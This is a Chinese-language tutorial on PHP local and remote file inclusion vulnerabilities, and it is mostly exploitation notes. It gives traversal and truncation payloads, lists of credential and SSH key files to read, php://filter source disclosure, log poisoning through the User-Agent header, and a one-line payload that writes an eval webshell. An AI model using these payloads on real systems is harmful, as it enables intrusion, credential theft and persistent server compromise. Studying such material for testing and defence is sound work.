# 文件包含漏洞

&nbsp;

## 什么是文件包含

* 程序开发人员一般会把重复使用的函数写到单个文件中，需要使用某个函数时直接调用此文件，而无需再次编写，这中文件调用的过程一般被称为文件包含。
* 程序开发人员一般希望代码更灵活，所以将被包含的文件设置为变量，用来进行动态调用，但正是由于这种灵活性，从而导致客户端可以调用一个恶意文件，造成文件包含漏洞。
* 几乎所有脚本语言都会提供文件包含的功能，但文件包含漏洞在PHP Web Application中居多,而在JSP、ASP、ASP.NET程序中却非常少，甚至没有，这是有些语言设计的弊端


### 【常见文件包含函数】

* include()：执行到include时才包含文件，找不到被包含文件时只会产生警告，脚本将继续执行
* require()：只要程序一运行就包含文件，找不到被包含的文件时会产生致命错误，并停止脚本
* include_once()和require_once()：若文件中代码已被包含则不会再次包含
* 考虑常用的几种包含方式为
  * 同目录包含 file=.htaccess
  * 目录遍历 ?file=../../../../../../../../../var/lib/locate.db
  * 日志注入 ?file=../../../../../../../../../var/log/apache/error.log
  * 利用 /proc/self/environ

### 【漏洞分类】

* **本地文件包含**
  * 可以包含本地文件，在条件允许时甚至能执行代码
  上传图片马，然后包含
  读敏感文件，读PHP文件
  包含日志文件GetShell
  包含/proc/self/envion文件GetShell
  包含data:或php://input等伪协议
  若有phpinfo则可以包含临时文件
  
* **远程文件包含**
  * 可以直接执行任意代码
>要保证php.ini中allow_url_fopen和allow_url_include要为On
>日志文件一般没有读取权限，而php有时会将日志文件放在/home/log里


&nbsp;

## 文件包含漏洞利用

### 【利用方法】

* 参数，各种参数要探测
* 截断，可能会添加一些文件后缀，使用%00，././././截断
* 程序用include()等文件包含函数通过动态变量的范式引入需要包含的文件
* 用户能够控制该动态变量





### 【本地文件包含】

* **本地文件包含漏洞流程**
  *  保存为 include.php
  ```php
  <?php 
  $test=$_GET['c'];
  include($test);?> 
  ```
  
  * 在同一个目录下创建test.txt 内容为  <?php phpinfo() ?>
  * 访问测试  //http://127.0.0.1/test/include.php?c=test.txt    //访问连接，将123.txt传送给c并赋给test变量


* **本地包含漏洞注意事项**
  * 相对路径：../../../etc/passwd
  * %00截断包含(PHP<5.3.4)，magic_quotes_gps=off 才可以，否则%00会被转义


* **防御绕过**
  * (php版本小于5.2.8(?)可以成功
  ```
  ?file=../../../../../../../../../etc/passwd/././././././.[…]/./././././.
  ```
  
  * (php版本小于5.2.8(?)可以成功，只适用windows
  ```
  ?file=../../../../../../../../../boot.ini/………[…]…………
  ```
  
  * dvwa中级难度的包含，这个主要是过滤了远程文件包含和我们目录的跳转，大小写混合输入就可以绕过远程文件包含的过滤
  * 目录跳转的过滤我们可以构造….//….//xxx.php，方式绕过，由于他只过滤一次，我们可以利用他的过滤动态拼接目录跳转，从而绕过过滤


### 【本地文件包含漏洞利用】

* **读敏感文件**
  * Windows：
  C:\boot.ini  //查看系统版本
  C:\Windows\System32\inetsrv\MetaBase.xml  //IIS配置文件
  C:\Windows\repair\sam  //存储系统初次安装的密码
  C:\Program Files\mysql\my.ini  //Mysql配置
  C:\Program Files\mysql\data\mysql\user.MYD  //Mysql root
  C:\Windows\php.ini  //php配置信息
  C:\Windows\my.ini  //Mysql配置信息
  
  * Linux：
  /root/.ssh/authorized_keys
  /root/.ssh/id_rsa
  /root/.ssh/id_ras.keystore
  /root/.ssh/known_hosts
  /etc/passwd
  /etc/shadow
  /etc/my.cnf
  /etc/httpd/conf/httpd.conf
  /root/.bash_history
  /root/.mysql_history
  /proc/self/fd/fd[0-9]*(文件标识符)
  /proc/mounts
  /porc/config.gz
  
* **包含日志(主要是得到日志的路径)**
  * 读日志路径：
  默认位置/var/log/httpd/access_log
  
  * 文件包含漏洞读取apache配置文件：
  index.php?page=/etc/init.d/httpd
  index.php?page=/etc/httpd/conf/httpd.conf
  
  * 日志会记录客户端请求及服务器响应的信息，访问http://www.xx.com/<?php phpinfo(); ?>时，<?php phpinfo(); ?>也会被记录在日志里，也可以插入到User-Agent


* **读PHP文件**
  * 直接包含php文件时会被解析，不能看到源码，可以用封装协议读取
  * ?page=php://filter/read=convert.base64-encode/resource=config.php  访问上述URL后会返回config.php中经过Base64加密后的字符串，解密即可得到源码

* **log投毒**
  * 工作原理是修改我们发送给web应用程序的数据，使日志包含可执行代码。
  * 首先是否可以访问log文件，其次看其中含有http header中的哪一项，例如useragent
  * 尝试将shellcode注入到useragent中
  * 使用LFI访问log文件

### 【远程文件包含】

* 远程的文件名不能为php可解析的扩展名，allow_url_fopen和allow_url_include为On是必须的
* 若在a.txt写入<?php fputs(fopen("shell.php","w"),"<?php @eval($_POST[xxx]); ?>") ?>，可直接写shell



